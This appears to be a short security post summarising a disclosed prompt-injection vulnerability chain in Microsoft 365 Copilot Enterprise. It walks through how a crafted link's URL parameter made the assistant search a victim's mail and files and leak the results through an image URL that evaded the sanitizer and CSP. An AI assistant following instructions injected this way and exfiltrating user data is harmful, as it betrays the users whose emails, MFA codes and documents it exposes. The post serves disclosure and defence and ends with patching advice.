Microsoft 365 Copilot Enterprise had a critical flaw that let attackers steal emails, MFA codes, and SharePoint files with one click. CVE-2026-42824 is patched. Check your tenant today.

Varonis Threat Labs just exposed SearchLeak.

A three-stage vulnerability chain in Microsoft 365 Copilot Enterprise.

CVE-2026-42824. Maximum severity. Microsoft patched it earlier this month.

Here is how it worked:

An attacker sends you a link. You click it. Copilot Enterprise Search opens.

The URL contains a parameter that Copilot interprets as instructions. It searches your mailbox, your calendar, your OneDrive, your SharePoint.

Then it embeds the stolen data in an image URL. The browser renders the image before Microsoft's sanitizer kicks in. A race condition.

Bing's image search fetches the attacker's URL to analyze the image. CSP is bypassed because Bing is on the allowlist.

Your email subject lines. Your MFA codes. Your meeting notes. Your acquisition plans. All on the attacker's server.

One click. No plugins. No special permissions. The link points to microsoft.com so your anti-phishing tools don't block it.

This is the new attack surface AI created.

Classic bugs — SSRF, HTML injection, race conditions — that were unexploitable before became devastating once prompt injection entered the chain.

If your organization runs M365 Copilot Enterprise, verify your patch status now. Review your CSP allowlists. Treat AI streaming output as untrusted at render time, not as a post-processing step.

The next SearchLeak is already being built.